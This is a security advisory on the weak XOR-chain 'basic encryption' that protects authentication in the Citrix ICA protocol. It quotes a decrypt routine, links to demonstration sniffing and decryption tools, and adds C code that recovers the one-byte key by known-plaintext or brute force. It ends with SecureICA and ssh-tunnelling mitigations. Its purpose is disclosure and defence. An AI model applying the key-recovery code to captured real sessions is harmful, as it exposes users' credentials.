COMMAND
Citrix ICA Basic Encryption
SYSTEMS AFFECTED
Citrix
PROBLEM
Dug Song found the following. The ICA (Independent Computing
Architecture) protocol used in various Citrix products (Winframe,
Metaframe) relies on a trivially cracked encryption scheme to
protect user authentication. The ICA basic encryption algorithm
is a variant of the simple XOR chain used for saved Winframe
passwords: the key is a single byte (256 possibilities), each
byte is XORed with the preceding ciphertext byte and the key, and
the first byte is masked with (key | 'C'):
#include <sys/types.h>	/* u_char */

/* Decrypt one ICA basic-encryption string in place. len is the
 * number of bytes in p. Each byte is chained on the previous
 * ciphertext byte, so the pass runs backwards from the last byte;
 * byte 0 is masked with (key | 'C'). */
void decrypt(u_char key, u_char *p, int len)
{
	int i;

	for (i = len - 1; i > 0; i--)
		p[i] = p[i-1] ^ p[i] ^ key;
	p[0] ^= (key | 'C');
}
Demonstration code to decrypt Winframe passwords stored in
appsrv.ini:
http://www.monkey.org/~dugsong/icadecrypt.c.txt
Demonstration code to sniff (and decrypt) ICA network
authentication:
http://www.monkey.org/~dugsong/dsniff/
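The following is an added example and not Dug Song's icadecrypt.c or dsniff code. It implements the XOR chain quoted above (ica_decrypt, iterating from the last byte downwards), a reconstructed inverse (ica_encrypt), and two ways an eavesdropper who holds only the ciphertext recovers the one-byte key: directly from a single known plaintext byte, or by trying all 256 keys against a crib. The key 0x5a and the plaintext "Passw0rd!" are constructed test data; whether the key byte also travels with the ciphertext on the wire is not covered by this page, so the example assumes the attacker does not have it.

```c
/*
 * Added example (not Dug Song's icadecrypt.c or dsniff): the ICA basic
 * XOR chain, its inverse, and recovery of the one-byte key.
 * Key 0x5a and plaintext "Passw0rd!" are constructed sample data.
 */
#include <stdio.h>
#include <string.h>

/* Decrypt in place. Ciphertext byte i is chained on ciphertext byte
 * i-1, so the pass runs backwards from the last byte (len-1);
 * byte 0 is masked with (key | 'C'), as in the quoted routine. */
static void ica_decrypt(unsigned char key, unsigned char *p, size_t len)
{
    size_t i;

    if (len == 0)
        return;
    for (i = len - 1; i > 0; i--)
        p[i] = p[i - 1] ^ p[i] ^ key;
    p[0] ^= (unsigned char)(key | 'C');
}

/* Inverse of ica_decrypt (reconstructed here): run forwards so each
 * byte chains on the already-encrypted previous byte. */
static void ica_encrypt(unsigned char key, unsigned char *p, size_t len)
{
    size_t i;

    if (len == 0)
        return;
    p[0] ^= (unsigned char)(key | 'C');
    for (i = 1; i < len; i++)
        p[i] = p[i] ^ p[i - 1] ^ key;
}

/* Crack 1: one known plaintext byte at position i >= 1 gives the key
 * outright, since c[i] = p[i] ^ c[i-1] ^ key. Position 0 only reveals
 * key | 'C', so it is refused. Returns the key, or -1. */
static int ica_key_from_known_byte(const unsigned char *ct, size_t i,
                                   unsigned char known)
{
    if (i == 0)
        return -1;
    return ct[i - 1] ^ ct[i] ^ known;
}

/* Crack 2: brute force. Try all 256 keys, decrypt a copy, keep the keys
 * whose plaintext matches the crib at the given offset. Returns the
 * number of matching keys and stores the smallest in *key_out. A crib
 * covering only byte 0 is ambiguous: every key with the same
 * (key | 'C') matches, i.e. 8 candidates, because 'C' = 0x43 forces
 * three key bits to 1. */
static int ica_crack(const unsigned char *ct, size_t len,
                     const unsigned char *crib, size_t crib_len,
                     size_t off, unsigned char *key_out)
{
    unsigned char tmp[256];
    int key, matches = 0;

    if (len > sizeof(tmp) || off + crib_len > len)
        return 0;
    for (key = 0; key < 256; key++) {
        memcpy(tmp, ct, len);
        ica_decrypt((unsigned char)key, tmp, len);
        if (memcmp(tmp + off, crib, crib_len) == 0) {
            if (matches++ == 0)
                *key_out = (unsigned char)key;
        }
    }
    return matches;
}

int main(void)
{
    unsigned char buf[16];
    unsigned char key = 0x5a, found;
    size_t i, len = 9;
    int n;

    memcpy(buf, "Passw0rd!", len);   /* constructed sample plaintext */
    ica_encrypt(key, buf, len);
    printf("ciphertext:");
    for (i = 0; i < len; i++)
        printf(" %02x", buf[i]);
    printf("\n");

    /* A single known byte ('w' at offset 4) is enough. */
    printf("key from known byte: 0x%02x\n",
           ica_key_from_known_byte(buf, 4, 'w'));

    /* A two-byte crib at offset 3 leaves exactly one candidate. */
    n = ica_crack(buf, len, (const unsigned char *)"sw", 2, 3, &found);
    printf("crib at offset 3: %d candidate(s), key 0x%02x\n", n, found);

    /* A crib on byte 0 alone leaves 8 candidates. */
    n = ica_crack(buf, len, (const unsigned char *)"P", 1, 0, &found);
    printf("crib at offset 0: %d candidate(s)\n", n);

    ica_decrypt(key, buf, len);
    printf("decrypted: %.*s\n", (int)len, (char *)buf);
    return 0;
}
```

The point the example makes is that the key is not merely short: one byte of guessable plaintext anywhere after the first byte yields it without any search, and even a blind search is 256 trials. The only wrinkle is the (key | 'C') mask on the first byte, which is why a crib at offset 0 narrows the key to eight values rather than one.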
SOLUTION
Citrix offers a secure alternative called SecureICA, which uses
Diffie-Hellman for key exchange and RC5 to encrypt the underlying
transport (now at 128-bit strength worldwide). While this is
certainly better than the simple XOR scheme outlined above, it
may still be vulnerable to an active man-in-the-middle attack:
Diffie-Hellman on its own only defeats a passive eavesdropper, and
unless the exchanged public values are authenticated, an active
attacker between client and server can negotiate a separate key
with each side. Caveat user.
SecureICA is only available for Windows and DOS clients. Unix,
Macintosh, and Java clients must use the insecure basic encryption.
Two ports are involved: the ICA session itself runs over TCP port
1494, while the ICA browser service, which supplies the server and
published-application lists, runs over UDP port 1604. ssh port
forwarding carries TCP only, so the browser service cannot be
tunnelled through ssh; a VPN is probably the only way to give Unix,
Macintosh and Java clients the whole protocol securely. The ICA
session, however, can be tunnelled through ssh: forward a local
port to port 1494 on the ICA server and point the client at the
forwarded port. The browser service can be worked around with NAT
techniques and the ALTADDR command provided by Citrix, but from a
security point-of-view you probably shouldn't NAT the browser
service at all - simply use the ssh port forwarding to connect to
a known server and a known application. The downside is that you
are not able to use seamless windows, as the client cannot get the
list of published applications from the ICA browser service.